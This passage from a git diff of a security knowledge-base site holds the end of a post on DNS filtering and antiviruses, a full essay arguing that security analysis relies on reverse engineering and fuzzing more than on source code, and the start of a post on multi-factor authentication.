It should also be noted that websites can detect which DNS servers a visitor uses. You can look at [DNSLeakTest](https://www.dnsleaktest.com/) as an example. Using non-network provided DNS servers adds to the fingerprint and make you more identifiable.
|
||||
|
||||
The best way to do DNS filtering is to use a VPN provider which has this feature built in like [ProtonVPN](https://protonvpn.com), [Mullvad](https://mullvad.net), and [IVPN](https://www.ivpn.net/) in order to not standout from other users of the same VPN provider. Even then, DNS filtering is purely a convenience feature and cannot be relied on for privacy and security.
|
||||
|
||||
## Antiviruses
|
||||
|
||||
Antiviruses are highly privileged processes with access to virtually all of your files and data, parsing through them trying to find something that matches a known bad signature. Beyond the fact that you need to trust the Antivirus company to not exfiltrate your sensitive data and that the signature list will never have all of the malware in existence, a vulnerable parser could lead to a system compromise. The [Abusing File Processing in Malware Detectors for Fun and Profit](/researches/Abusing-File-Processing-in-Malware-Detectors-for-Fun-and-Profit.pdf) research paper by Suman Jana and Vitaly Shmatikov discusses this in detail.
|
||||
|
||||
Here are some other examples of Anviruses being attack surfaces on their own:
|
||||
- [Arbitrary Code Execution with Avast's Javascript Interpreter](https://github.com/taviso/avscript)
|
||||
- [Memory Corruption with Bitdefender](https://landave.io/2020/11/bitdefender-upx-unpacking-featuring-ten-memory-corruptions/)
|
||||
- [Kaspersky in the Middle](https://web.archive.org/web/20210729054039/https://palant.info/2019/08/19/kaspersky-in-the-middle-what-could-possibly-go-wrong/)
|
||||
|
||||
|
||||
The proper way to deal with untrusted applications is not to scan them with an Antivirus, but to confine them in such a way that even if they were malicious, they cannot do much damage at all. This has already been achieved on secure mobile operating systems like Android and iOS with their application sandbox. Typically, attacks against these systems require an exploit chain against the operating system, or for the user to actually mess up and grant an app access to sensitive data. On desktop operating systems, you should utilize virtualization to contain untrusted applications in their own virtual machine. This can be done with a system like Qubes OS, the [Windows Sandbox](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-sandbox/windows-sandbox-overview), or just general KVM / HyperV virtual machines.
|
||||
|
||||
|
||||
## Default Permit
|
||||
|
||||
Surprisingly (or unsurprisingly), the [The Six Dumbest Ideas in Computer Security](https://www.ranum.com/security/computer_security/editorials/dumb/) article from almost 20 years ago still holds true today. It explains the problem with Default Permit better than I ever could. In short, when setting up a Firewall or some sort of filter list, it is better to start out by blocking everything, then allowing only the traffic that you need. That way, you don't have to worry about applications that you didn't care enough to block turning out to be vulnerable. Sometimes, "goodness enumeration" is the solution to the problem.
|
||||
|
||||
## Conclusion
|
||||
|
||||
By now, I hope I have clearly explained why badness enumeration is never the solution to the problem. Sometimes, it can be a nice-to-have thing, like a VPN provider blocking advertisements and trackers on the DNS level to make the web experience more enjoyable. Other times, it can be harmful to your privacy and security, like with a malicious/vulnerable extension or antivirus. The important thing to keep in mind is that you cannot rely on badness enumeration for true privacy and security, and you should always be aware of the privacy and security implications that certain options may entail.
|
223
content/posts/knowledge/FLOSS Security.md
Normal file
223
content/posts/knowledge/FLOSS Security.md
Normal file
|
@ -0,0 +1,223 @@
|
|||
---
|
||||
title: "FLOSS Security"
|
||||
date: "2022-02-02T23:16:00+00:00"
|
||||
tags: ['Knowledge Base', 'Privacy', 'Security']
|
||||
author: Rohan Kumar
|
||||
canonicalURL: https://seirdy.one/posts/2022/02/02/floss-security/
|
||||
ShowCanonicalLink: true
|
||||
---
|
||||
|
||||
While source code is critical for user autonomy, it isn't required to evaluate software security or understand run-time behavior.
|
||||
|
||||
One of the biggest parts of the Free and Open Source Software definitions is the freedom to study a program and modify it; in other words, access to editable source code. I agree that such access is essential; however, far too many people support source availability for the _wrong_ reasons. One such reason is that source code is necessary to have any degree of transparency into how a piece of software operates, and is therefore necessary to determine if it is at all secure or trustworthy. Although security through obscurity is certainly not a robust measure, this claim has two issues:
|
||||
|
||||
- Source code describes what a program is designed to do; it is unnecessary and insufficient to determine if what it actually does aligns with its intended design.
|
||||
- Vulnerability discovery doesn't require source code.
|
||||
|
||||
I'd like to expand on these issues, focusing primarily on compiled binaries. Bear in mind that I do not think that source availability is _useless_ from a security perspective (it certainly makes audits easier), and I _do_ think that source availability is required for user freedom. I'm arguing only that **source unavailability doesn't imply insecurity**, and **source availability doesn't imply security**. It's possible (and often preferable) to perform security analysis on binaries, without necessarily having source code. In fact, vulnerability discovery doesn't typically rely upon source code analysis.
|
||||
|
||||
I'll update this post occasionally as I learn more on the subject. If you like it, check back in a month or two to see if it has something new.
|
||||
|
||||
_PS: this stance is not absolute; I concede to several good counter-arguments [at the bottom](#good-counter-arguments)!_
|
||||
|
||||
## How security fixes work
|
||||
|
||||
I don't think anyone seriously claims that software's security instantly improves the second its source code is published. The argument I'm responding to is that source code is necessary to understand what a program does and how (in)secure it is, and without it we can't know for sure.
|
||||
|
||||
Assuming a re-write that fundamentally changes a program's architecture is not an option[^1], software security typically improves by fixing vulnerabilities via something resembling this process:
|
||||
|
||||
1. Someone discovers a vulnerability
|
||||
2. Developers are informed of the vulnerability
|
||||
3. Developers reproduce the issue and understand what caused it
|
||||
4. Developers patch the software to fix the vulnerability
|
||||
|
||||
Source code is typically helpful (sometimes essential) to Step 3. If someone has completed Step 3, they will require source code to proceed to Step 4. Source code _isn't necessary for Steps 1 and 2_; these steps rely upon understanding how a program misbehaves. For that, we use _reverse engineering_ and/or _fuzzing_.
|
||||
|
||||
## Reverse engineering
|
||||
|
||||
Understanding _how a program is designed_ is not the same as understanding _what a program does._ A reasonable level of one type of understanding does not imply the other.
|
||||
|
||||
Source code[^2] is essential to describe a program's high-level, human-comprehensible design; it represents a contract that outlines how a developer _expects_ a program to behave. A compiler or interpreter[^3] must then translate it into machine instructions. But source code isn't always easy to map directly to machine instructions because it is part of a complex system:
|
||||
|
||||
- Compilers (sometimes even interpreters) can apply optimizations and hardening measures that are difficult to reason about. This is especially true for Just-In-Time compilers that leverage run-time information.
|
||||
|
||||
- The operating system itself may be poorly understood by the developers, and run a program in a way that contradicts a developer's expectations.
|
||||
|
||||
- Toolchains, interpreters, and operating systems can have bugs that impact program execution.
|
||||
|
||||
- Different compilers and compiler flags can offer different security guarantees and mitigations.
|
||||
|
||||
- Source code [can be deceptive](https://en.wikipedia.org/wiki/Underhanded_C_Contest) by featuring sneaky obfuscation techniques, sometimes unintentionally. Confusing naming patterns, re-definitions, and vulnerabilities masquerading as innocent bugs (plausible deniability; look up "hypocrite commits" for an example) have all been well-documented.
|
||||
|
||||
- All of the above points apply to each dependency and the underlying operating system, which can impact a program's behavior.
|
||||
|
||||
Furthermore, all programmers are flawed mortals who don't always fully understand source code. Everyone who's done a non-trivial amount of programming is familiar with the feeling of encountering a bug during run-time for which the cause is impossible to find...until they notice it staring them in the face on Line 12. Think of all the bugs that _aren't_ so easily noticed.
|
||||
|
||||
Reading the source code, compiling, and passing tests isn't sufficient to show us a program's final behavior. The only way to know what a program does when you run it is to...run it.[^4]
|
||||
|
||||
### Special builds
|
||||
|
||||
Almost all programmers are fully aware of their limited ability, which is why most already employ techniques to analyze run-time behavior that don't depend on source code. For example, developers of several compiled languages[^5] can build binaries with sanitizers to detect undefined behavior, races, uninitialized reads, etc. that human eyes may have missed when reading source code. While source code is necessary to _build_ these binaries, it isn't necessary to run them and observe failures.
|
||||
|
||||
Distributing binaries with sanitizers and debug information to testers is a valid way to collect data about a program's potential security issues.
|
||||
|
||||
### Dynamic analysis
|
||||
|
||||
It's hard to figure out which syscalls and files a large program program needs by reading its source, especially when certain libraries (e.g. the libc implementation/version) can vary. A syscall tracer like [`strace(1)`](https://strace.io/)[^6] makes the process trivial.
|
||||
|
||||
A personal example: the understanding I gained from `strace` was necessary for me to write my [bubblewrap scripts](https://sr.ht/~seirdy/bwrap-scripts/). These scripts use [`bubblewrap(1)`](https://github.com/containers/bubblewrap) to sandbox programs with the minimum permissions possible. Analyzing every relevant program and library's source code would have taken me months, while `strace` gave me everything I needed to know in an afternoon: analyzing the `strace` output told me exactly which syscalls to allow and which files to grant access to, without even having to know what language the program was written in. I generated the initial version of the syscall allow-lists with the following command[^7]:
|
||||
|
||||
```
|
||||
strace name-of-program program-args 2>&1 \
|
||||
| rg '^([a-z_]*)\(.*' --replace '$1' \
|
||||
| sort | uniq
|
||||
```
|
||||
|
||||
This also extends to determining how programs utilize the network: packet sniffers like [Wireshark](https://www.wireshark.org/) can determine when a program connects to the network, and where it connects.
|
||||
|
||||
These methods are not flawless. Syscall tracers are only designed to shed light on how a program interacts with the kernel. Kernel interactions tell us plenty (it's sometimes all we need), but they don't give the whole story. Furthermore, packet inspection can be made a bit painful by transit encryption[^8]; tracing a program's execution alongside packet inspection can offer clarity, but this is not easy.
|
||||
|
||||
For more information, we turn to [**core dumps**](https://en.wikipedia.org/wiki/Core_dump), also known as memory dumps. Core dumps share the state of a program during execution or upon crashing, giving us greater visibility into exactly what data a program is processing. Builds containing debugging symbols (e.g. [DWARF](https://dwarfstd.org/)) have more detailed core dumps. Vendors that release daily snapshots of pre-release builds typically include some symbols to give testers more detail concerning the causes of crashes. Web browsers are a common example: Chromium dev snapshots, Chrome Canary, Firefox Nightly, WebKit Canary builds, etc. all include debug symbols. [Until 2019](https://twitter.com/MisteFr/status/1168597562703716354?s=20), _Minecraft: Bedrock Edition_ included debug symbols which were used heavily by the modding community.[^9]
|
||||
|
||||
#### Dynamic analysis example: Zoom
|
||||
|
||||
In 2020, Zoom Video Communications came under scrutiny for marketing its "Zoom" software as a secure, end-to-end encrypted solution for video conferencing. Zoom's documentation claimed that it used "AES-256" encryption. Without source code, did we have to take the docs at their word?
|
||||
|
||||
[The Citizen Lab](https://citizenlab.ca/) didn't. In April 2020, it published [a report](https://citizenlab.ca/2020/04/move-fast-roll-your-own-crypto-a-quick-look-at-the-confidentiality-of-zoom-meetings/) revealing critical flaws in Zoom's encryption. It utilized Wireshark and [mitmproxy](https://mitmproxy.org/) to analyze networking activity, and inspected core dumps to learn about its encryption implementation. The Citizen Lab's researchers found that Zoom actually used an incredibly flawed implementation of a weak version of AES-128 (ECB mode), and easily bypassed it.
|
||||
|
||||
Syscall tracing, packet sniffing, and core dumps are great, but they rely on manual execution which might not hit all the desired code paths. Fortunately, there are other forms of analysis available.
|
||||
|
||||
### Binary analysis
|
||||
|
||||
Tracing execution and inspecting memory dumps can be considered forms of reverse engineering, but they only offer a surface-level view of what's going on. Reverse engineering gets much more interesting when we analyze a binary artifact.
|
||||
|
||||
Static binary analysis is a powerful way to inspect a program's underlying design. Decompilation (especially when supplemented with debug symbols) can re-construct a binary's assembly or source code. Symbol names may look incomprehensible in stripped binaries, and comments will be missing. What's left is more than enough to decipher control flow to uncover how a program processes data. This process can be tedious, especially if a program uses certain forms of binary obfuscation.
|
||||
|
||||
The goal doesn't have to be a complete understanding of a program's design (incredibly difficult without source code); it's typically to answer a specific question, fill in a gap left by tracing/fuzzing, or find a well-known property. When developers publish documentation on the security architecture of their closed-source software, reverse engineering tools like decompilers are exactly what you need to verify their honesty (or lack thereof).
|
||||
|
||||
Decompilers are seldom used alone in this context. Instead, they're typically a component of reverse engineering frameworks that also sport memory analysis, debugging tools, scripting, and sometimes even IDEs. I use [the radare project](https://www.radare.org/n/), but [Ghidra](https://ghidra-sre.org/) is also popular. Their documentation should help you get started if you're interested.
|
||||
|
||||
### Example: malware analysis
|
||||
|
||||
These reverse-engineering techniques---a combination of tracing, packet sniffing, binary analysis, and memory dumps---make up the workings of most modern malware analysis. See [this example](https://www.hybrid-analysis.com/sample/1ef3b7e9ba5f486afe53fcbd71f69c3f9a01813f35732222f64c0981a0906429/5e428f69c88e9e64c33afe64) of a fully-automated analysis of the Zoom Windows installer. It enumerates plenty of information about Zoom without access to its source code: reading unique machine information, anti-VM and anti-reverse-engineering tricks, reading config files, various types of network access, scanning mounted volumes, and more.
|
||||
|
||||
To try this out yourself, use a sandbox designed for dynamic analysis. [Cuckoo](https://github.com/cuckoosandbox) is a common and easy-to-use solution, while [DRAKVUF](https://drakvuf.com/) is more advanced.
|
||||
|
||||
### Extreme example: the truth about Intel ME and AMT
|
||||
|
||||
The Intel Management Engine (ME) is a mandatory subsystem of all Intel processors (after 2008) with extremely privileged access to the host system. Active Management Technology (AMT) runs atop it on the subset of Intel processors with "vPro" branding. The latter can be disabled and is intended for organizations to remotely manage their inventory (installing software, monitoring, remote power-on/sleep/wake, etc).
|
||||
|
||||
The fact that Intel ME has such deep access to the host system and the fact that it's proprietary have both made it the subject of a high degree of scrutiny. Many people (most of whom have little experience in the area) connected these two facts together to allege that the ME is a backdoor, often by confusedly citing functionality of Intel AMT instead of ME. Is it really impossible to know for sure?
|
||||
|
||||
I picked Intel ME+AMT to serve as an extreme example: it shows both the power and limitations of the analysis approaches covered. ME isn't made of simple executables you can just run in an OS because it sits far below the OS, in what's sometimes called "Ring -3".[^10] Analysis is limited to external monitoring (e.g. by monitoring network activity) and reverse-engineering unpacked partially-obfuscated firmware updates, with help from official documentation. This is slower and harder than analyzing a typical executable or library.
|
||||
|
||||
Answers are a bit complex and...more boring than what sensationalized headlines would say. Reverse engineers such as Igor Skochinsky and Nicola Corna (the developers of [me-tools](https://github.com/skochinsky/me-tools) and [me_cleaner](https://github.com/corna/me_cleaner), respectively) have [analyzed ME](https://fahrplan.events.ccc.de/congress/2017/Fahrplan/system/event_attachments/attachments/000/003/391/original/Intel_ME_myths_and_reality.pdf), while researchers such as Vassilios Ververis have [thoroughly analyzed AMT](https://kth.diva-portal.org/smash/get/diva2:508256/FULLTEXT01) in 2010. Interestingly, the former pair argues that auditing binary code is preferable to potentially misleading source code: binary analysis allows auditors to "cut the crap" and inspect what software is truly made of. However, this was balanced by a form of binary obfuscation that the pair encountered; I'll describe it in a moment.
|
||||
|
||||
Simply monitoring network activity and systematically testing all claims made by the documentation allowed Ververis to uncover a host of security issues in Intel AMT. However, no undocumented features have (to my knowledge) been uncovered. The problematic findings revolved around flawed/insecure implementations of documented functionality. In other words: there's been no evidence of AMT being "a backdoor", but its security flaws could have had a similar impact. Fortunately, AMT can be disabled. What about ME?
|
||||
|
||||
This is where some binary analysis comes in. Neither Skochinsky's [ME Secrets](https://recon.cx/2014/slides/Recon%202014%20Skochinsky.pdf) presentation nor the [previously-linked one](https://fahrplan.events.ccc.de/congress/2017/Fahrplan/system/event_attachments/attachments/000/003/391/original/Intel_ME_myths_and_reality.pdf) he gave with Corna seem to enumerate any contradictions with [official documentation](https://link.springer.com/book/10.1007/978-1-4302-6572-6).
|
||||
|
||||
Unfortunately, some components are poorly understood due to being obfuscated using [Huffman compression with unknown dictionaries](http://io.netgarage.org/me/). Understanding the inner workings of the obfuscated components blurs the line between software reverse-engineering and figuring out how the chips are actually made, the latter of which is nigh-impossible if you don't have access to a chip lab full of cash. However, black-box analysis does tell us about the capabilities of these components: see page 21 of "ME Secrets". Thanks to zdctg for clarifying this.
|
||||
|
||||
Skochinsky's and Corna's analysis was sufficient to clarify (but not completely contradict) sensationalism claiming that ME can remotely lock any PC (it was a former opt-in feature), can spy on anything the user does (they clarified that access is limited to unblocked parts of the host memory and the integrated GPU, but doesn't include e.g. the framebuffer), etc.
|
||||
|
||||
While claims such as "ME is a black box that can do anything" are misleading, ME not without its share of vulnerabilities. My favorite look at its issues is a presentation by [Mark Ermolov](https://www.blackhat.com/eu-17/speakers/Mark-Ermolov.html) and [Maxim Goryachy](https://www.blackhat.com/eu-17/speakers/Maxim-Goryachy.html) at Black Hat Europe 2017: [How to Hack a Turned-Off Computer, or Running Unsigned Code in Intel Management Engine](https://www.blackhat.com/docs/eu-17/materials/eu-17-Goryachy-How-To-Hack-A-Turned-Off-Computer-Or-Running-Unsigned-Code-In-Intel-Management-Engine-wp.pdf).
|
||||
|
||||
In short: ME being proprietary doesn't mean that we can't find out how (in)secure it is. Binary analysis when paired with runtime inspection can give us a good understanding of what trade-offs we make by using it. While ME has a history of serious vulnerabilities, they're nowhere near what [borderline conspiracy theories](https://web.archive.org/web/20210302072839/themerkle.com/what-is-the-intel-management-engine-backdoor/) claim.[^11]
|
||||
|
||||
(Note: Intel is not alone here. Other chips typically have equivalents, e.g. AMD Secure Technology).
|
||||
|
||||
Fuzzing
|
||||
-------
|
||||
|
||||
Manual invocation of a program paired with a tracer like `strace` won't always exercise all code paths or find edge-cases. [Fuzzing helps bridge this gap](https://en.wikipedia.org/wiki/Fuzzing): it automates the process of causing a program to fail by generating random or malformed data to feed it. Researchers then study failures and failure-conditions to isolate a bug.
|
||||
|
||||
Fuzzing doesn't necessarily depend on access to source code, as it is a black-box technique. Fuzzers like [American Fuzzy Loop (AFL)](https://lcamtuf.coredump.cx/afl/) normally use [special builds](#special-builds), but [other fuzzing setups](https://aflplus.plus/docs/binaryonly_fuzzing/) can work with just about any binaries. In fact, some types of fuzz tests (e.g. [fuzzing an API](https://github.com/KissPeter/APIFuzzer/) for a web service) hardly need any implementation details.
|
||||
|
||||
Fuzzing frequently catches bugs that are only apparent by running a program, not by reading source code. Even so, the biggest beneficiaries of fuzzing are open source projects. [cURL](https://github.com/curl/curl-fuzzer), [OpenSSL](https://github.com/openssl/openssl/tree/master/fuzz), web browsers, text rendering libraries (HarfBuzz, FreeType) and toolchains (GCC, Clang, the official Go toolchain, etc.) are some notable examples.
|
||||
|
||||
> I've said it before but let me say it again: fuzzing is really the top method to find problems in curl once we've fixed all flaws that the static analyzers we use have pointed out. The primary fuzzing for curl is done by OSS-Fuzz, that tirelessly keeps hammering on the most recent curl code.
|
||||
|
||||
- [Daniel Stenberg](https://daniel.haxx.se/) | [A Google grant for libcurl work](https://daniel.haxx.se/blog/2020/09/23/a-google-grant-for-libcurl-work/)
|
||||
|
||||
If you want to get started with fuzzing, I recommend checking out [the quick-start guide for American Fuzzy Loop](https://github.com/google/AFL/blob/master/docs/QuickStartGuide.txt). Some languages like Go 1.18 also have fuzzing tools available right in the standard library.
|
||||
|
||||
### Example: CVE-2022-0185
|
||||
|
||||
A recent example of how fuzzing helps spot a vulnerability in an open-source project is [CVE-<wbr />2022-0185](https://www.openwall.com/lists/oss-security/2022/01/18/7): a Linux 0-day found by the Crusaders of Rust a few weeks ago. It was discovered using the [syzkaller](https://github.com/google/syzkaller) kernel fuzzer. The process was documented on Will's Root:
|
||||
|
||||
[CVE-2022-0185 - Winning a $31337 Bounty after Pwning Ubuntu and Escaping Google's KCTF Containers](https://www.willsroot.io/2022/01/cve-2022-0185.html) by [willsroot](https://willsroot.io)
|
||||
|
||||
I _highly_ encourage giving it a read; it's the perfect example of fuzzing with sanitizers to find a vulnerability, reproducing the vulnerability (by writing a tiny C program), _then_ diving into the source code to find and fix the cause, and finally reporting the issue (with a patch!). When source isn't available, the vendor would assume responsibility for the "find and fix" steps.
|
||||
|
||||
The fact that some of the most-used pieces of FLOSS in existence have been the biggest beneficiaries of source-agnostic approaches to vulnerability analysis should be quite revealing. The source code to these projects has received attention from millions of eyes, yet they _still_ invest in fuzzing infrastructure and vulnerability-hunters prefer analyzing artifacts over inspecting the source.
|
||||
|
||||
## Good counter-arguments
|
||||
|
||||
I readily concede to several points in favor of source availability from a security perspective:
|
||||
|
||||
- Source code can make analysis _easier_ by _supplementing_ source-independent approaches. The lines between the steps I mentioned in the [four-step vulnerability-fixing process](#how-security-fixes-work) are blurry.
|
||||
|
||||
- Patching vulnerabilities is important. Source availability makes it possible for the community, package maintainers, or reporters of a vulnerability to patch software. Package maintainers often blur the line between "packager" and "contributor" by helping projects migrate away from abandoned/insecure dependencies. One example that comes to mind is the Python 2 to Python 3 transition for projects like Calibre.[^12] Being able to fix issues independent of upstream support is an important mitigation against [user domestication](https://seirdy.one/posts/2021/01/27/whatsapp-and-the-domestication-of-users/).
|
||||
|
||||
- Some developers/vendors don't distribute binaries that make use of modern toolchain-level exploit mitigations (e.g. <abbr title="Position-Independent Executables">PIE</abbr>, <abbr title="ReLocation Read-Only">RELRO</abbr>, stack canaries, automatic variable initialization, [<abbr title="Control-Flow Integrity">CFI</abbr>](https://clang.llvm.org/docs/ControlFlowIntegrity.html), etc.[^13]). In these cases, building software yourself with these mitigations (or delegating it to a distro that enforces them) requires source code availability (or at least some sort of intermediate representation).
|
||||
|
||||
- Closed-source software may or may not have builds available that include sanitizers and debug symbols.
|
||||
|
||||
- Although fuzzing release binaries is possible, fuzzing is much easier to do when source code is available. Vendors of proprietary software seldom release special fuzz-friendly builds, and filtering out false-positives can be quite tedious without understanding high-level design.
|
||||
|
||||
- It is certainly possible to notice a vulnerability in source code. Excluding low-hanging fruit typically caught by static code analysis and peer review, it's not the main way most vulnerabilities are found nowadays (thanks to [X_CLI](https://www.broken-by-design.fr/) for [reminding me about what source analysis does accomplish](https://lemmy.ml/post/167321/comment/117774).
|
||||
|
||||
- Software as a Service can be incredibly difficult to analyze, as we typically have little more than the ability to query a server. Servers don't send core dumps, server-side binaries, or trace logs for analysis. Furthermore, it's difficult to verify which software a server is running.[^14] For services that require trusting a server, access to the server-side software is important from both a security and a user-freedom perspective
|
||||
|
||||
Most of this post is written with the assumption that binaries are inspectable and traceable. Binary obfuscation and some forms of content protection/<abbr title="Digital Rights Management">DRM</abbr> violate this assumption and actually do make analysis more difficult.
|
||||
|
||||
Beyond source code, transparency into the development helps assure users of compliance with good security practices. Viewing VCS history, patch reviews, linter configurations, etc. reveal the standards that code is being held up to, some of which can be related to bug-squashing and security.
|
||||
|
||||
[Patience](https://matrix.to/#/@hypokeimenon:tchncs.de) on Matrix also had a great response, which I agree with and adapt below:
|
||||
|
||||
Whether or not the source code is available for software does not change how insecure it is. However, there are good security-related incentives to publish source code.
|
||||
|
||||
- Doing so improves vulnerability patchability and future architectural improvement by lowering the barrier to contribution. The fixes that follow can be _shared and used by other projects_ across the field, some of which can in turn be used by the vendor. This isn't a zero-sum game; a rising tide lifts all boats.
|
||||
- It's generally good practice to assume an attacker has full knowledge of a system instead of relying on security through obscurity. Releasing code provides strong assurance that this assumption is being made. It's a way for vendors to put their money where their mouth is.
|
||||
|
||||
Both Patience and [Drew Vault](https://drewdevault.com/) argue that given the above points, a project whose goal is maximum security would release code. Strictly speaking, I agree. Good intentions don't imply good results, but they can _supplement_ good results to provide some trust in a project's future.
|
||||
|
||||
## Conclusion
|
||||
|
||||
I've gone over some examples of how analyzing a software's security properties need not depend on source code, and vulnerability discovery in both FLOSS and in proprietary software uses source-agnostic techniques. Dynamic and static black-box techniques are powerful tools that work well from user-space (Zoom) to kernel-space (Linux) to low-level components like Intel ME+AMT. Source code enables the vulnerability-fixing process but has limited utility for the evaluation/discovery process.
|
||||
|
||||
Don't assume software is safer than proprietary alternatives just because its source is visible; come to a conclusion after analyzing both. There are lots of great reasons to switch from macOS or Windows to Linux (it's been my main OS for years), but security is [low on that list](https://madaidans-insecurities.github.io/linux.html).
|
||||
|
||||
All other things being mostly equal, FLOSS is obviously _preferable_ from a security perspective; I listed some reasons why in the counter-arguments section. Unfortunately, being helpful is not the same as being necessary. All I argue is that source unavailability does not imply insecurity, and source availability does not imply security. Analysis approaches that don't rely on source are typically the most powerful, and can be applied to both source-available and source-unavailable software. Plenty of proprietary software is more secure than FLOSS alternatives; few would argue that the sandboxing employed by Google Chrome or Microsoft Edge is more vulnerable than Pale Moon or most WebKitGTK-based browsers, for instance.
|
||||
|
||||
Releasing source code is just one thing vendors can do to improve audits; other options include releasing test builds with debug symbols/sanitizers, publishing docs describing their architecture, and/or just keeping software small and simple. We should evaluate software security through _study_ rather than source model. Support the right things for the right reasons, and help others make informed choices with accurate information. There are enough good reasons to support software freedom; we don't need to rely on bad ones.
|
||||
|
||||
|
||||
[^1]: Writing an alternative or re-implementation doesn't require access to the original's source code, as is evidenced by a plethora of clean-room re-implementations of existing software written to circumvent the need to comply with license terms.
|
||||
|
||||
[^2]: Ideally well-documented, non-obfuscated code.
|
||||
|
||||
[^3]: Or a JIT compiler, or a [bunch of clockwork](https://en.wikipedia.org/wiki/Analytical_Engine), or...
|
||||
|
||||
[^4]: For completeness, I should add that there is one source-based approach that can verify correctness: formal proofs. Functional programming languages that [support dependent types](https://en.wikipedia.org/wiki/Dependent_type) can be provably correct at the source level. Assuming their self-hosted toolchains have similar guarantees, developers using these languages might have to worry less about bugs they couldn't find in the source code. This can alleviate concerns that their language runtimes can make it hard to reason about low-level behavior. Thanks to [Adrian Cochrane](https://adrian.geek.nz/) for pointing this out.
|
||||
|
||||
[^5]: For example: C, C++, Objective-C, Go, Fortran, and others can utilize sanitizers from Clang and/or GCC.
|
||||
|
||||
[^6]: This is probably what people in _The Matrix_ were using to see that iconic [digital rain](https://en.wikipedia.org/wiki/Matrix_digital_rain).
|
||||
|
||||
[^7]: This command only lists syscall names, but I did eventually follow the example of [sandbox-app-launcher](https://github.com/Whonix/sandbox-app-launcher) by allowing certain syscalls (e.g. ioctl) only when invoked with certain parameters. Also, I used [ripgrep](https://github.com/BurntSushi/ripgrep) because I'm more familiar with <abbr title="Perl-Compatible Regular Expressions">PCRE</abbr>-style capture groups.
|
||||
|
||||
[^8]: Decrypting these packets typically involves saving and using key logs, or using endpoints with [known pre-master secrets](https://blog.didierstevens.com/2020/12/14/decrypting-tls-streams-with-wireshark-part-1/).
|
||||
|
||||
[^9]: I invite any modders who miss these debug symbols to check out the FLOSS [Minetest](https://www.minetest.net/), perhaps with the [MineClone2](https://content.minetest.net/packages/Wuzzy/mineclone2/) game.
|
||||
|
||||
[^10]: See page 127-130 of the Invisible Things Lab's [Quest to the Core slides](https://invisiblethingslab.com/resources/misc09/Quest%20To%20The%20Core%20%28public%29.pdf). Bear in mind that they often refer to AMT running atop ME.
|
||||
|
||||
[^11]: As an aside: your security isn't necessarily improved by "disabling" it, since it still runs during the initial boot sequence and does provide some hardening measures of its own (e.g., a <abbr title="Trusted Platform Module">TPM</abbr>).
|
||||
|
||||
[^12]: In 2017, Calibre's author actually wanted to stay with Python 2 after its EOL date, and [maintain Python 2 himself](https://bugs.launchpad.net/calibre/+bug/1714107). Users and package maintainers were quite unhappy with this, as Python 2 would no longer be receiving security fixes after 2020. While official releases of Calibre use a bundled Python interpreter, distro packages typically use the system Python package; Calibre's popularity and insistence on using Python 2 made it a roadblock to getting rid of the Python 2 package in most distros. What eventually happened was that community members (especially [Eli Schwartz](https://github.com/eli-schwartz) and [Flaviu Tamas](https://flaviutamas.com/) submitted patches to migrate Calibre away from Python 2. Calibre migrated to Python 3 by [version 5.0](https://calibre-ebook.com/new-in/fourteen).
|
||||
|
||||
[^13]: Linux distributions' CFI+<abbr title="Adress-Space Layout Randomization">ASLR</abbr> implementations rely executables compiled with CFI+PIE support, and ideally with stack-smashing protectors and no-execute bits. These implementations are flawed (see [On the Effectiveness of Full-ASLR on 64-bit Linux](https://web.archive.org/web/20211021222659/http://cybersecurity.upv.es/attacks/offset2lib/offset2lib-paper.pdf) and [Brad Spengler's presentation comparing these with PaX's own implementation](https://grsecurity.net/PaX-presentation.pdf)).
|
||||
|
||||
[^14]: The [best attempt I know of](https://signal.org/blog/private-contact-discovery/) leverages [Trusted Execution Environments](https://en.wikipedia.org/wiki/Trusted_execution_environment), but for limited functionality using an implementation that's [far from bulletproof](https://en.wikipedia.org/wiki/Software_Guard_Extensions#Attacks).
|
84
content/posts/knowledge/Multi-factor Authentication.md
Normal file
84
content/posts/knowledge/Multi-factor Authentication.md
Normal file
|
@ -0,0 +1,84 @@
|
|||
---
|
||||
title: "Multi-factor Authentication"
|
||||
date: 2022-07-16
|
||||
tags: ['Knowledge Base', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
**Multi-factor authentication** is a security mechanism that requires additional verification beyond your username (or email) and password. This usually comes in the form of a one-time passcode, a push notification, or plugging in and tapping a hardware security key.
|
||||
|
||||
## Common protocols
|
||||
|
||||
### Email and SMS MFA
|
||||
|
||||
Email and SMS MFA are examples of the weaker MFA protocols. Email MFA is not great as whoever controls your email account can typically both reset your password and receive your MFA verification. SMS, on the other hand, is problematic due to the lack of any kind of encryption, making it vulnerable to sniffing. [Sim swap](https://en.wikipedia.org/wiki/SIM_swap_scam) attacks, if carried out successfully, will allow an attacker to receive your one-time passcode while locking you out of your own account. In certain cases, websites or services may also allow the user to reset their account login by calling them using the phone number used for MFA, which could be faked with a [spoofed CallerID](https://en.wikipedia.org/wiki/Caller_ID_spoofing).
|
||||
|
||||
Only use these protocols when it is the only option you have, and be very careful with SMS MFA as it could actually worsen your security.
|
||||
|
||||
### Push Confirmations
|
||||
|
||||
Push confirmation MFA is typically a notification being sent to an app on your phone asking you to confirm new account logins. This method is a lot better than SMS or email, since an attacker typically wouldn't be able to get these push notifications without having an already logged-in device.
|
||||
|
||||
Push confirmation in most cases relies on a third-party provider like [Duo](https://duo.com/). This means that trust is placed in a server that neither you nor your service provider control. A malicious push confirmation server could compromise your MFA or profile you based on which website and account you use with the service.
|
||||
|
||||
Even if the push notification application and server is provided by a first-party as is the case with Microsoft login and [Microsoft Authenticator](https://www.microsoft.com/en-us/security/mobile-authenticator-app), there is still a risk of you accidentally tapping on the confirmation button.
|
||||
|
||||
### Time-based One-time Password (TOTP)
|
||||
|
||||
TOTP is one of the most common forms of MFA available. When you set up TOTP, you setup a "[shared secret](https://en.wikipedia.org/wiki/Shared_secret)" with the service that you intend to use and store it in your authentication app.
|
||||
|
||||
The time-limited code is then derived from the shared secret and the current time. As the code is only valid for a short time, without access to the shared secret, an adversary cannot generate new codes.
|
||||
|
||||
If you have a [Yubikey](https://www.yubico.com/), you should store the "shared secrets" on the key itself using the [Yubico Authenticator](https://www.yubico.com/products/yubico-authenticator/) app. After the initial setup, the Yubico Authenticator will only expose the 6 digit code to the machine it is running on, but not the shared secret. Additional security can be set up by requiring touch confirmation, protecting digit codes not in used from a compromised operating system.
|
||||
|
||||
